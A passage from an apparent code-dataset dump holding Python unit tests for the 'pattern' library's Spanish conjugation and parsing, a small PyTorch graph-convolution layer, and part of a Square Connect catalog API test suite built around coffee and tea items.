pattern.db import Datasheet\n test = {}\n for w, lemma, tag, f in Datasheet.load(os.path.join(PATH, \"corpora\", \"wordforms-es-davies.csv\")):\n if tag == \"j\":\n test.setdefault(lemma, []).append(w)\n i, n = 0, 0\n for pred, attr in test.items():\n attr = sorted(attr, key=len, reverse=True)[0]\n if es.predicative(attr) == pred:\n i += 1\n n += 1\n self.assertTrue(float(i) / n > 0.92)\n print(\"pattern.es.predicative()\")\n\n def test_find_lemma(self):\n # Assert the accuracy of the verb lemmatization algorithm.\n i, n = 0, 0\n for v1, v2 in es.inflect.verbs.inflections.items():\n if es.inflect.verbs.find_lemma(v1) == v2:\n i += 1\n n += 1\n self.assertTrue(float(i) / n > 0.80)\n print(\"pattern.es.inflect.verbs.find_lemma()\")\n\n def test_find_lexeme(self):\n # Assert the accuracy of the verb conjugation algorithm.\n i, n = 0, 0\n for v, lexeme1 in es.inflect.verbs.infinitives.items():\n lexeme2 = es.inflect.verbs.find_lexeme(v)\n for j in range(len(lexeme2)):\n if lexeme1[j] == lexeme2[j]:\n i += 1\n n += 1\n self.assertTrue(float(i) / n > 0.85)\n print(\"pattern.es.inflect.verbs.find_lexeme()\")\n\n def test_conjugate(self):\n # Assert different tenses with different conjugations.\n for (v1, v2, tense) in (\n (\"ser\", \"ser\", es.INFINITIVE),\n (\"ser\", \"soy\", (es.PRESENT, 1, es.SINGULAR)),\n (\"ser\", \"eres\", (es.PRESENT, 2, es.SINGULAR)),\n (\"ser\", \"es\", (es.PRESENT, 3, es.SINGULAR)),\n (\"ser\", \"somos\", (es.PRESENT, 1, es.PLURAL)),\n (\"ser\", \"sois\", (es.PRESENT, 2, es.PLURAL)),\n (\"ser\", \"son\", (es.PRESENT, 3, es.PLURAL)),\n (\"ser\", \"siendo\", (es.PRESENT + es.PARTICIPLE)),\n (\"ser\", \"sido\", (es.PAST + es.PARTICIPLE)),\n (\"ser\", \"era\", (es.IMPERFECT, 1, es.SINGULAR)),\n (\"ser\", \"eras\", (es.IMPERFECT, 2, es.SINGULAR)),\n (\"ser\", \"era\", (es.IMPERFECT, 3, es.SINGULAR)),\n (\"ser\", \"éramos\", (es.IMPERFECT, 1, es.PLURAL)),\n (\"ser\", \"erais\", (es.IMPERFECT, 2, es.PLURAL)),\n (\"ser\", \"eran\", (es.IMPERFECT, 3, es.PLURAL)),\n (\"ser\", \"fui\", (es.PRETERITE, 1, es.SINGULAR)),\n (\"ser\", \"fuiste\", (es.PRETERITE, 2, es.SINGULAR)),\n (\"ser\", \"fue\", (es.PRETERITE, 3, es.SINGULAR)),\n (\"ser\", \"fuimos\", (es.PRETERITE, 1, es.PLURAL)),\n (\"ser\", \"fuisteis\", (es.PRETERITE, 2, es.PLURAL)),\n (\"ser\", \"fueron\", (es.PRETERITE, 3, es.PLURAL)),\n (\"ser\", \"sería\", (es.CONDITIONAL, 1, es.SINGULAR)),\n (\"ser\", \"serías\", (es.CONDITIONAL, 2, es.SINGULAR)),\n (\"ser\", \"sería\", (es.CONDITIONAL, 3, es.SINGULAR)),\n (\"ser\", \"seríamos\", (es.CONDITIONAL, 1, es.PLURAL)),\n (\"ser\", \"seríais\", (es.CONDITIONAL, 2, es.PLURAL)),\n (\"ser\", \"serían\", (es.CONDITIONAL, 3, es.PLURAL)),\n (\"ser\", \"seré\", (es.FUTURE, 1, es.SINGULAR)),\n (\"ser\", \"serás\", (es.FUTURE, 2, es.SINGULAR)),\n (\"ser\", \"será\", (es.FUTURE, 3, es.SINGULAR)),\n (\"ser\", \"seremos\", (es.FUTURE, 1, es.PLURAL)),\n (\"ser\", \"seréis\", (es.FUTURE, 2, es.PLURAL)),\n (\"ser\", \"serán\", (es.FUTURE, 3, es.PLURAL)),\n (\"ser\", \"sé\", (es.PRESENT, 2, es.SINGULAR, es.IMPERATIVE)),\n (\"ser\", \"sed\", (es.PRESENT, 2, es.PLURAL, es.IMPERATIVE)),\n (\"ser\", \"sea\", (es.PRESENT, 1, es.SINGULAR, es.SUBJUNCTIVE)),\n (\"ser\", \"seas\", (es.PRESENT, 2, es.SINGULAR, es.SUBJUNCTIVE)),\n (\"ser\", \"sea\", (es.PRESENT, 3, es.SINGULAR, es.SUBJUNCTIVE)),\n (\"ser\", \"seamos\", (es.PRESENT, 1, es.PLURAL, es.SUBJUNCTIVE)),\n (\"ser\", \"seáis\", (es.PRESENT, 2, es.PLURAL, es.SUBJUNCTIVE)),\n (\"ser\", \"sean\", (es.PRESENT, 3, es.PLURAL, es.SUBJUNCTIVE)),\n (\"ser\", 
\"fuera\", (es.PAST, 1, es.SINGULAR, es.SUBJUNCTIVE)),\n (\"ser\", \"fueras\", (es.PAST, 2, es.SINGULAR, es.SUBJUNCTIVE)),\n (\"ser\", \"fuera\", (es.PAST, 3, es.SINGULAR, es.SUBJUNCTIVE)),\n (\"ser\", \"fuéramos\", (es.PAST, 1, es.PLURAL, es.SUBJUNCTIVE)),\n (\"ser\", \"fuerais\", (es.PAST, 2, es.PLURAL, es.SUBJUNCTIVE)),\n (\"ser\", \"fueran\", (es.PAST, 3, es.PLURAL, es.SUBJUNCTIVE))):\n self.assertEqual(es.conjugate(v1, tense), v2)\n print(\"pattern.es.conjugate()\")\n\n def test_lexeme(self):\n # Assert all inflections of \"ser\".\n v = es.lexeme(\"ser\")\n self.assertEqual(v, [\n 'ser', 'soy', 'eres', 'es', 'somos', 'sois', 'son', 'siendo',\n 'fui', 'fuiste', 'fue', 'fuimos', 'fuisteis', 'fueron', 'sido',\n 'era', 'eras', 'éramos', 'erais', 'eran',\n 'seré', 'serás', 'será', 'seremos', 'seréis', 'serán',\n 'sería', 'serías', 'seríamos', 'seríais', 'serían',\n 'sé', 'sed',\n 'sea', 'seas', 'seamos', 'seáis', 'sean',\n 'fuera', 'fueras', 'fuéramos', 'fuerais', 'fueran'\n ])\n print(\"pattern.es.inflect.lexeme()\")\n\n def test_tenses(self):\n # Assert tense recognition.\n self.assertTrue((es.PRESENT, 3, es.SG) in es.tenses(\"es\"))\n self.assertTrue(\"2sg\" in es.tenses(\"eres\"))\n # The CONDITIONAL is sometimes described as a mood,\n # and sometimes as a tense of the indicative mood (e.g., in Spanish):\n t1 = (es.CONDITIONAL, 1, es.SG)\n t2 = (es.PRESENT, 1, es.SG, es.CONDITIONAL)\n self.assertTrue(\"1sg->\" in es.tenses(\"sería\"))\n self.assertTrue(t1 in es.tenses(\"sería\"))\n self.assertTrue(t2 in es.tenses(\"sería\"))\n self.assertTrue(t1 in es.tenses(es.conjugate(\"ser\", mood=es.INDICATIVE, tense=es.CONDITIONAL)))\n self.assertTrue(t2 in es.tenses(es.conjugate(\"ser\", mood=es.CONDITIONAL)))\n print(\"pattern.es.tenses()\")\n\n#---------------------------------------------------------------------------------------------------\n\n\nclass TestParser(unittest.TestCase):\n\n def setUp(self):\n pass\n\n def test_find_lemmata(self):\n # Assert lemmata for nouns, adjectives, verbs and determiners.\n v = es.parser.find_lemmata([\n [\"Los\", \"DT\"], [\"gatos\", \"NNS\"], [\"negros\", \"JJ\"], [\"se\", \"PRP\"], [\"sentó\", \"VB\"],\n [\"en\", \"IN\"], [\"la\", \"DT\"], [\"alfombra\", \"NN\"]])\n self.assertEqual(v, [\n [\"Los\", \"DT\", \"el\"],\n [\"gatos\", \"NNS\", \"gato\"],\n [\"negros\", \"JJ\", \"negro\"],\n [\"se\", \"PRP\", \"se\"],\n [\"sentó\", \"VB\", \"sentar\"],\n [\"en\", \"IN\", \"en\"],\n [\"la\", \"DT\", \"el\"],\n [\"alfombra\", \"NN\", \"alfombra\"]])\n print(\"pattern.es.parser.find_lemmata()\")\n\n def test_parse(self):\n # Assert parsed output with Penn Treebank II tags (slash-formatted).\n # \"el gato negro\" is a noun phrase, \"en la alfombra\" is a prepositional noun phrase.\n v = es.parser.parse(\"El gato negro se sentó en la alfombra.\")\n self.assertEqual(v, # XXX - shouldn't \"se\" be part of the verb phrase?\n \"El/DT/B-NP/O gato/NN/I-NP/O negro/JJ/I-NP/O \" + \\\n \"se/PRP/B-NP/O sentó/VB/B-VP/O \" + \\\n \"en/IN/B-PP/B-PNP la/DT/B-NP/I-PNP alfombra/NN/I-NP/I-PNP ././O/O\"\n )\n # Assert the accuracy of the Spanish tagger.\n i, n = 0, 0\n for sentence in open(os.path.join(PATH, \"corpora\", \"tagged-es-wikicorpus.txt\")).readlines():\n sentence = sentence.strip()\n s1 = [w.split(\"/\") for w in sentence.split(\" \")]\n s2 = [[w for w, pos in s1]]\n s2 = es.parse(s2, tokenize=False, tagset=es.PAROLE)\n s2 = [w.split(\"/\") for w in s2.split(\" \")]\n for j in range(len(s1)):\n if s1[j][1] == s2[j][1]:\n i += 1\n n += 1\n #print(float(i) / n)\n 
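
The assertion table above pins down individual forms of "ser" one tense at a time. For orientation, here is a short usage sketch of the same public API, assuming the `pattern` package is installed; the expected values are taken directly from the assertions above.

```python
# Usage sketch for the API exercised by the tests above (requires `pattern`).
from pattern.es import conjugate, lexeme, tenses, PRESENT, SG

print(conjugate("ser", (PRESENT, 1, SG)))  # 'soy', per the conjugation table
print("2sg" in tenses("eres"))             # True: tense recognition by alias
print(lexeme("ser")[:7])                   # first few of the inflected forms
```
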
self.assertTrue(float(i) / n > 0.92)\n print(\"pattern.es.parser.parse()\")\n\n def test_tag(self):\n # Assert [(\"el\", \"DT\"), (\"gato\", \"NN\"), (\"negro\", \"JJ\")].\n v = es.tag(\"el gato negro\")\n self.assertEqual(v, [(\"el\", \"DT\"), (\"gato\", \"NN\"), (\"negro\", \"JJ\")])\n print(\"pattern.es.tag()\")\n\n def test_command_line(self):\n # Assert parsed output from the command-line (example from the documentation).\n p = [\"python\", \"-m\", \"pattern.es\", \"-s\", \"El gato negro.\", \"-OTCRL\"]\n p = subprocess.Popen(p, stdout=subprocess.PIPE)\n p.wait()\n v = p.stdout.read().decode('utf-8')\n v = v.strip()\n self.assertEqual(v, \"El/DT/B-NP/O/O/el gato/NN/I-NP/O/O/gato negro/JJ/I-NP/O/O/negro ././O/O/O/.\")\n print(\"python -m pattern.es\")\n\n#---------------------------------------------------------------------------------------------------\n\n\ndef suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestInflection))\n suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestParser))\n return suite\n\nif __name__ == \"__main__\":\n\n result = unittest.TextTestRunner(verbosity=1).run(suite())\n sys.exit(not result.wasSuccessful())\n","repo_name":"clips/pattern","sub_path":"test/test_es.py","file_name":"test_es.py","file_ext":"py","file_size_in_byte":12071,"program_lang":"python","lang":"en","doc_type":"code","stars":8585,"dataset":"github-code","pt":"52"} +{"seq_id":"34809446038","text":"import torch.nn as nn\r\nfrom torch.nn import Module, Parameter\r\n\r\n\r\nclass TrainableSGConv(Module):\r\n def __init__(self,\r\n in_features,\r\n out_features,\r\n bias=False,\r\n K=2,\r\n cached=True,\r\n **kwargs):\r\n\r\n super().__init__()\r\n self.K = K\r\n self.w = nn.Linear(in_features, out_features, bias=bias)\r\n self.cache = None\r\n self.cached = cached\r\n\r\n def forward(self, x, adj):\r\n\r\n if self.cache is None or not self.cached:\r\n for _ in range(self.K):\r\n x = adj.mm(x)\r\n self.cache = x\r\n else:\r\n x = self.cache\r\n\r\n return self.w(x)\r\n\r\n def reset_parameters(self):\r\n self.w.reset_parameters()\r\n\r\n def __repr__(self):\r\n return f\"{self.__class__.__name__}({self.in_features}, {self.out_features}, K={self.K})\"\r\n","repo_name":"EdisonLeeeee/GraphGallery","sub_path":"graphgallery/nn/layers/pytorch/conv/trainable_sgc.py","file_name":"trainable_sgc.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":450,"dataset":"github-code","pt":"52"} +{"seq_id":"39945855597","text":"from __future__ import absolute_import\n\nimport unittest\nimport uuid\n\nimport squareconnect\nfrom squareconnect.apis.catalog_api import CatalogApi\nfrom squareconnect.models import BatchDeleteCatalogObjectsRequest\nfrom squareconnect.models import BatchRetrieveCatalogObjectsRequest\nfrom squareconnect.models import BatchUpsertCatalogObjectsRequest\nfrom squareconnect.models import CatalogCategory\nfrom squareconnect.models import CatalogDiscount\nfrom squareconnect.models import CatalogItem\nfrom squareconnect.models import CatalogItemModifierListInfo\nfrom squareconnect.models import CatalogItemVariation\nfrom squareconnect.models import CatalogModifier\nfrom squareconnect.models import CatalogModifierList\nfrom squareconnect.models import CatalogObject\nfrom squareconnect.models import CatalogObjectBatch\nfrom squareconnect.models import CatalogQuery\nfrom squareconnect.models import CatalogQueryItemsForTax\nfrom squareconnect.models import CatalogQueryPrefix\nfrom 
squareconnect.models import CatalogTax\nfrom squareconnect.models import Money\nfrom squareconnect.models import SearchCatalogObjectsRequest\nfrom squareconnect.models import UpdateItemModifierListsRequest\nfrom squareconnect.models import UpdateItemTaxesRequest\nfrom squareconnect.models import UpsertCatalogObjectRequest\nfrom .utils import APITestCase\n\n\nclass TestCatalogApi(APITestCase):\n CLIENT_ID_BEVERAGES = '#Beverages'\n CLIENT_ID_CHOCOLATE = '#Chocolate'\n CLIENT_ID_COFFEE = '#Coffee'\n CLIENT_ID_COFFEE_LARGE = '#LargeCoffee'\n CLIENT_ID_COFFEE_SMALL = '#SmallCoffee'\n CLIENT_ID_DISCOUNT = '#Discount'\n CLIENT_ID_HAZELNUT = '#Hazelnut'\n CLIENT_ID_MILK_SKIM = '#SkimMilk'\n CLIENT_ID_MILK_SOY = '#SoyMilk'\n CLIENT_ID_MILK_WHOLE = '#WholeMilk'\n CLIENT_ID_MILKS = '#Milks'\n CLIENT_ID_SALES_TAX = '#SalesTax'\n CLIENT_ID_SYRUPS = '#Syrups'\n CLIENT_ID_TEA = '#Tea'\n CLIENT_ID_TEA_LARGE = '#LargeTea'\n CLIENT_ID_TEA_SMALL = '#SmallTea'\n CLIENT_ID_VANILLA = '#Vanilla'\n\n objects_by_client_id = dict()\n test_objects = []\n\n def build_beverages(self):\n cat = CatalogCategory()\n cat.name = 'Beverages'\n co = CatalogObject()\n co.type = 'CATEGORY'\n co.id = self.CLIENT_ID_BEVERAGES\n co.category_data = cat\n return co\n\n def build_milks(self):\n whmm = CatalogModifier()\n whmm.name = 'Whole Milk'\n whm = CatalogObject()\n whm.type = 'MODIFIER'\n whm.id = self.CLIENT_ID_MILK_WHOLE\n whm.modifier_data = whmm\n\n skmm = CatalogModifier()\n skmm.name = 'Skim Milk'\n skm = CatalogObject()\n skm.type = 'MODIFIER'\n skm.id = self.CLIENT_ID_MILK_SKIM\n skm.modifier_data = skmm\n\n symm = CatalogModifier()\n symm.name = 'Soy Milk'\n symm.price_money = Money(50, 'USD')\n sym = CatalogObject()\n sym.type = 'MODIFIER'\n sym.id = self.CLIENT_ID_MILK_SOY\n sym.modifier_data = symm\n\n ml = CatalogModifierList()\n ml.name = 'Milks'\n ml.modifiers = [whm, skm, sym]\n\n co = CatalogObject()\n co.type = 'MODIFIER_LIST'\n co.id = self.CLIENT_ID_MILKS\n co.modifier_list_data = ml\n return co\n\n def build_syrups(self):\n hzmm = CatalogModifier()\n hzmm.name = 'Hazelnut'\n hzm = CatalogObject()\n hzm.type = 'MODIFIER'\n hzm.id = self.CLIENT_ID_HAZELNUT\n hzm.modifier_data = hzmm\n\n vnmm = CatalogModifier()\n vnmm.name = 'Vanilla'\n vnm = CatalogObject()\n vnm.type = 'MODIFIER'\n vnm.id = self.CLIENT_ID_VANILLA\n vnm.modifier_data = vnmm\n\n chmm = CatalogModifier()\n chmm.name = 'Chocolate'\n chm = CatalogObject()\n chm.type = 'MODIFIER'\n chm.id = self.CLIENT_ID_CHOCOLATE\n chm.modifier_data = chmm\n\n ml = CatalogModifierList()\n ml.name = 'Syrups'\n ml.modifiers = [hzm, vnm, chm]\n\n co = CatalogObject()\n co.type = 'MODIFIER_LIST'\n co.id = self.CLIENT_ID_SYRUPS\n co.modifier_list_data = ml\n return co\n\n def build_coffee(self):\n c = CatalogObject()\n c.type = 'ITEM'\n c.id = self.CLIENT_ID_COFFEE\n c.present_at_all_locations = True\n\n sciv = CatalogItemVariation()\n sciv.item_id = c.id\n sciv.name = 'Small'\n sciv.pricing_type = 'FIXED_PRICING'\n sciv.price_money = Money(195, 'USD')\n sc = CatalogObject()\n sc.type = 'ITEM_VARIATION'\n sc.id = self.CLIENT_ID_COFFEE_SMALL\n sc.present_at_all_locations = True\n sc.item_variation_data = sciv\n\n lciv = CatalogItemVariation()\n lciv.item_id = c.id\n lciv.name = 'Large'\n lciv.pricing_type = 'FIXED_PRICING'\n lciv.price_money = Money(250, 'USD')\n lc = CatalogObject()\n lc.type = 'ITEM_VARIATION'\n lc.id = self.CLIENT_ID_COFFEE_LARGE\n lc.present_at_all_locations = True\n lc.item_variation_data = lciv\n\n cimli = CatalogItemModifierListInfo()\n 
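
The builder methods below wire items, variations, modifier lists, and taxes together through temporary `#`-prefixed client IDs that Square later maps to real object IDs. A condensed sketch of that pattern for a single one-variation item follows; the names, IDs, and price are illustrative, not part of the test fixture.

```python
# Condensed version of the build_* pattern: a client-side "#" id ties the item
# and its variation together until the server assigns permanent ids.
from squareconnect.models import (CatalogItem, CatalogItemVariation,
                                  CatalogObject, Money)

def build_simple_item(client_id, name, price_cents):
    variation_data = CatalogItemVariation()
    variation_data.item_id = client_id          # refers to the item's client id
    variation_data.name = 'Regular'
    variation_data.pricing_type = 'FIXED_PRICING'
    variation_data.price_money = Money(price_cents, 'USD')

    variation = CatalogObject()
    variation.type = 'ITEM_VARIATION'
    variation.id = client_id + 'Regular'
    variation.item_variation_data = variation_data

    item_data = CatalogItem()
    item_data.name = name
    item_data.variations = [variation]

    item = CatalogObject()
    item.type = 'ITEM'
    item.id = client_id
    item.item_data = item_data
    return item

cocoa = build_simple_item('#Cocoa', 'Hot Cocoa', 225)
```
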
cimli.modifier_list_id = self.CLIENT_ID_MILKS\n\n ci = CatalogItem()\n ci.name = 'Coffee'\n ci.description = 'Hot bean juice'\n ci.abbreviation = 'Co'\n ci.category_id = self.CLIENT_ID_BEVERAGES\n ci.modifier_list_info = [cimli]\n ci.tax_ids = [self.CLIENT_ID_SALES_TAX]\n ci.variations = [sc, lc]\n\n c.item_data = ci\n return c\n\n def build_tea(self):\n c = CatalogObject()\n c.type = 'ITEM'\n c.id = self.CLIENT_ID_TEA\n c.present_at_all_locations = True\n\n stiv = CatalogItemVariation()\n stiv.item_id = c.id\n stiv.name = 'Small'\n stiv.pricing_type = 'FIXED_PRICING'\n stiv.price_money = Money(150, 'USD')\n st = CatalogObject()\n st.type = 'ITEM_VARIATION'\n st.id = self.CLIENT_ID_TEA_SMALL\n st.present_at_all_locations = True\n st.item_variation_data = stiv\n\n ltiv = CatalogItemVariation()\n ltiv.item_id = c.id\n ltiv.name = 'Large'\n ltiv.pricing_type = 'FIXED_PRICING'\n ltiv.price_money = Money(200, 'USD')\n lt = CatalogObject()\n lt.type = 'ITEM_VARIATION'\n lt.id = self.CLIENT_ID_TEA_LARGE\n lt.present_at_all_locations = True\n lt.item_variation_data = ltiv\n\n cimli = CatalogItemModifierListInfo()\n cimli.modifier_list_id = self.CLIENT_ID_MILKS\n\n ci = CatalogItem()\n ci.name = 'Tea'\n ci.description = 'Hot leaf juice'\n ci.abbreviation = 'Te'\n ci.category_id = self.CLIENT_ID_BEVERAGES\n ci.modifier_list_info = [cimli]\n ci.tax_ids = [self.CLIENT_ID_SALES_TAX]\n ci.variations = [st, lt]\n\n c.item_data = ci\n return c\n\n def build_sales_tax(self):\n co = CatalogObject()\n co.type = 'TAX'\n co.id = self.CLIENT_ID_SALES_TAX\n co.present_at_all_locations = True\n\n t = CatalogTax()\n t.name = 'Sales Tax'\n t.calculation_phase = 'TAX_SUBTOTAL_PHASE'\n t.inclusion_type = 'ADDITIVE'\n t.percentage = '5.0'\n t.applies_to_custom_amounts = True\n t.enabled = True\n\n co.tax_data = t\n return co\n\n def build_test_catalog(self):\n self.test_objects = [\n self.build_beverages(),\n self.build_milks(),\n self.build_syrups(),\n self.build_coffee(),\n self.build_tea(),\n self.build_sales_tax()\n ]\n batch = CatalogObjectBatch(self.test_objects)\n batches = [batch]\n req = BatchUpsertCatalogObjectsRequest(str(uuid.uuid4()), batches)\n res = self.api.batch_upsert_catalog_objects(req)\n self.assertIsNone(res.errors)\n for m in res.id_mappings:\n self.objects_by_client_id[m.client_object_id] = m.object_id\n\n def delete_test_catalog(self):\n while True:\n res = self.api.list_catalog()\n if res.objects is None:\n break\n ids = set()\n self.assertIsNone(res.errors)\n for co in res.objects:\n ids.add(co.id)\n delete_request = BatchDeleteCatalogObjectsRequest()\n delete_request.object_ids = list(ids)\n self.api.batch_delete_catalog_objects(delete_request)\n\n def setUp(self):\n account = self.accounts['US-Prod']\n self.api = squareconnect.apis.catalog_api.CatalogApi()\n self.api.api_client.configuration.access_token = account['access_token']\n self.delete_test_catalog()\n self.build_test_catalog()\n\n def tearDown(self):\n self.delete_test_catalog()\n\n def test_batch_delete_catalog_objects(self):\n ids = self.objects_by_client_id\n coffee_id = ids[self.CLIENT_ID_COFFEE]\n small_coffee_id = ids[self.CLIENT_ID_COFFEE_SMALL]\n large_coffee_id = ids[self.CLIENT_ID_COFFEE_LARGE]\n small_tea_id = ids[self.CLIENT_ID_TEA_SMALL]\n\n delete_request = BatchDeleteCatalogObjectsRequest()\n delete_request.object_ids = [coffee_id, small_tea_id]\n response = self.api.batch_delete_catalog_objects(delete_request)\n self.assertIsNone(response.errors)\n self.assertEqual(4, len(response.deleted_object_ids))\n 
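
`build_test_catalog` below passes `str(uuid.uuid4())` as the first constructor argument of `BatchUpsertCatalogObjectsRequest`; that idempotency key is what lets a retried request be de-duplicated server-side. A sketch of a retry loop that deliberately keeps one key across attempts; `api` is assumed to be a configured `CatalogApi`, and real code would catch the SDK's `ApiException` rather than bare `Exception`.

```python
# Sketch: retry-safe batch upsert. Reusing the same idempotency key means a
# retry after a timeout cannot create the catalog objects twice.
import uuid

from squareconnect.models import (BatchUpsertCatalogObjectsRequest,
                                  CatalogObjectBatch)

def upsert_with_retries(api, objects, attempts=3):
    key = str(uuid.uuid4())  # one key shared by every attempt
    request = BatchUpsertCatalogObjectsRequest(key, [CatalogObjectBatch(objects)])
    last_error = None
    for _ in range(attempts):
        try:
            return api.batch_upsert_catalog_objects(request)
        except Exception as exc:  # assumption: catch the SDK's ApiException here
            last_error = exc
    raise last_error
```
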
self.assertIn(coffee_id, response.deleted_object_ids)\n self.assertIn(small_coffee_id, response.deleted_object_ids)\n self.assertIn(large_coffee_id, response.deleted_object_ids)\n self.assertIn(small_tea_id, response.deleted_object_ids)\n\n def test_batch_retrieve_catalog_objects(self):\n ids = self.objects_by_client_id\n coffee_id = ids[self.CLIENT_ID_COFFEE]\n sales_tax_id = ids[self.CLIENT_ID_SALES_TAX]\n beverages_id = ids[self.CLIENT_ID_BEVERAGES]\n milks_id = ids[self.CLIENT_ID_MILKS]\n\n request = BatchRetrieveCatalogObjectsRequest([coffee_id, sales_tax_id])\n response = self.api.batch_retrieve_catalog_objects(request)\n\n self.assertEqual(2, len(response.objects))\n\n coffee = response.objects[0]\n self.assertEqual(coffee.type, 'ITEM')\n self.assertEqual(coffee_id, coffee.id)\n self.assertIsNotNone(coffee.updated_at)\n self.assertNotEqual(coffee.version, 0)\n self.assertFalse(coffee.is_deleted)\n self.assertIsNone(coffee.catalog_v1_ids)\n self.assertTrue(coffee.present_at_all_locations)\n self.assertIsNone(coffee.present_at_location_ids)\n self.assertIsNone(coffee.absent_at_location_ids)\n\n self.assertEqual('Coffee', coffee.item_data.name)\n self.assertEqual('Hot bean juice', coffee.item_data.description)\n self.assertEqual('Co', coffee.item_data.abbreviation)\n self.assertIsNone(coffee.item_data.label_color)\n self.assertIsNone(coffee.item_data.available_online)\n self.assertIsNone(coffee.item_data.available_for_pickup)\n self.assertIsNone(coffee.item_data.available_electronically)\n self.assertEqual(beverages_id, coffee.item_data.category_id)\n self.assertEqual(1, len(coffee.item_data.tax_ids))\n self.assertEqual(sales_tax_id, coffee.item_data.tax_ids[0])\n self.assertEqual(1, len(coffee.item_data.modifier_list_info))\n mod_list_info = coffee.item_data.modifier_list_info[0]\n self.assertEqual(milks_id, mod_list_info.modifier_list_id)\n self.assertIsNone(mod_list_info.modifier_overrides)\n self.assertIsNone(mod_list_info.min_selected_modifiers)\n self.assertIsNone(mod_list_info.max_selected_modifiers)\n self.assertIsNone(mod_list_info.enabled)\n\n self.assertEqual(2, len(coffee.item_data.variations))\n\n variation0 = coffee.item_data.variations[0].item_variation_data\n self.assertEqual('Small', variation0.name)\n self.assertEqual('FIXED_PRICING', variation0.pricing_type)\n self.assertEqual(195, variation0.price_money.amount)\n self.assertEqual('USD', variation0.price_money.currency)\n\n variation1 = coffee.item_data.variations[1].item_variation_data\n self.assertEqual('Large', variation1.name)\n self.assertEqual('FIXED_PRICING', variation1.pricing_type)\n self.assertEqual(250, variation1.price_money.amount)\n self.assertEqual('USD', variation1.price_money.currency)\n\n self.assertIsNone(coffee.category_data)\n self.assertIsNone(coffee.item_variation_data)\n self.assertIsNone(coffee.tax_data)\n self.assertIsNone(coffee.discount_data)\n self.assertIsNone(coffee.modifier_list_data)\n self.assertIsNone(coffee.modifier_data)\n\n sales_tax = response.objects[1]\n self.assertEqual('TAX', sales_tax.type)\n self.assertEqual(sales_tax_id, sales_tax.id)\n self.assertEqual('Sales Tax', sales_tax.tax_data.name)\n\n def test_batch_upsert_catalog_objects(self):\n batches = []\n num_objects = 0\n for batch_num in range(3):\n objects = []\n batch = CatalogObjectBatch(objects)\n batches.append(batch)\n for i in range(100):\n item_id = '#Items-{}-{}'.format(batch_num, i)\n variation_id = '#ItemVariation-{}-{}'.format(batch_num, i)\n\n item = CatalogObject()\n item.type = 'ITEM'\n item.id = 
item_id\n\n item_data = CatalogItem()\n item_data.name = 'Item-{}-{}'.format(batch_num, i)\n item.item_data = item_data\n\n variation = CatalogObject()\n variation.type = 'VARIATION'\n variation.id = variation_id\n\n variation_data = CatalogItemVariation()\n variation_data.item_id = item_id\n variation_data.name = 'Regular'\n variation_data.pricing_type = 'VARIABLE_PRICING'\n variation.item_variation_data = variation_data\n\n objects.append(item)\n num_objects += 1\n\n req = BatchUpsertCatalogObjectsRequest(str(uuid.uuid4()), batches)\n res = self.api.batch_upsert_catalog_objects(req)\n self.assertIsNone(res.errors)\n\n self.assertEquals(num_objects, len(res.objects))\n\n def test_catalog_info(self):\n ci = self.api.catalog_info()\n self.assertIsNone(ci.errors)\n limits = ci.limits\n self.assertEqual(200, limits.batch_delete_max_object_ids)\n self.assertEqual(1000, limits.batch_retrieve_max_object_ids)\n self.assertEqual(1000, limits.batch_upsert_max_objects_per_batch)\n self.assertEqual(10000, limits.batch_upsert_max_total_objects)\n self.assertEqual(1000, limits.search_max_page_limit)\n self.assertEqual(1000, limits.update_item_modifier_lists_max_item_ids)\n self.assertEqual(1000, limits.update_item_modifier_lists_max_modifier_lists_to_disable)\n self.assertEqual(1000, limits.update_item_modifier_lists_max_modifier_lists_to_enable)\n self.assertEqual(1000, limits.update_item_taxes_max_item_ids)\n self.assertEqual(1000, limits.update_item_taxes_max_taxes_to_disable)\n self.assertEqual(1000, limits.update_item_taxes_max_taxes_to_enable)\n\n def test_delete_catalog_object(self):\n ids = self.objects_by_client_id\n coffee_id = ids[self.CLIENT_ID_COFFEE]\n small_coffee_id = ids[self.CLIENT_ID_COFFEE_SMALL]\n large_coffee_id = ids[self.CLIENT_ID_COFFEE_LARGE]\n res = self.api.delete_catalog_object(coffee_id)\n\n self.assertEquals(3, len(res.deleted_object_ids))\n self.assertIn(coffee_id, res.deleted_object_ids)\n self.assertIn(small_coffee_id, res.deleted_object_ids)\n self.assertIn(large_coffee_id, res.deleted_object_ids)\n\n def test_list_catalog(self):\n res = self.api.list_catalog()\n self.assertEqual(len(self.test_objects), len(res.objects))\n\n def test_retrieve_catalog_object(self):\n ids = self.objects_by_client_id\n coffee_id = ids[self.CLIENT_ID_COFFEE]\n res = self.api.retrieve_catalog_object(coffee_id,\n include_related_objects=True)\n self.assertIsNone(res.errors)\n self.assertEquals(coffee_id, res.object.id)\n self.assertEqual(3, len(res.related_objects))\n\n got_milks = False\n got_sales_tax = False\n got_beverages = False\n for obj in res.related_objects:\n if obj.type == 'MODIFIER_LIST'\\\n and obj.modifier_list_data.name == 'Milks':\n got_milks = True\n elif obj.type == 'TAX'\\\n and obj.tax_data.name == 'Sales Tax':\n got_sales_tax = True\n elif obj.type == 'CATEGORY' \\\n and obj.category_data.name == 'Beverages':\n got_beverages = True\n\n self.assertTrue(got_milks)\n self.assertTrue(got_sales_tax)\n self.assertTrue(got_beverages)\n\n def test_search_catalog_objects(self):\n req1 = SearchCatalogObjectsRequest()\n prefix_query = CatalogQueryPrefix()\n prefix_query.attribute_name = 'name'\n prefix_query.attribute_prefix = 'Sm'\n query1 = CatalogQuery()\n query1.prefix_query = prefix_query\n req1.query = query1\n req1.include_deleted_objects = False\n req1.include_related_objects = False\n\n res1 = self.api.search_catalog_objects(req1)\n self.assertEqual(2, len(res1.objects))\n self.assertEqual('ITEM_VARIATION', res1.objects[0].type)\n self.assertEqual('Small', 
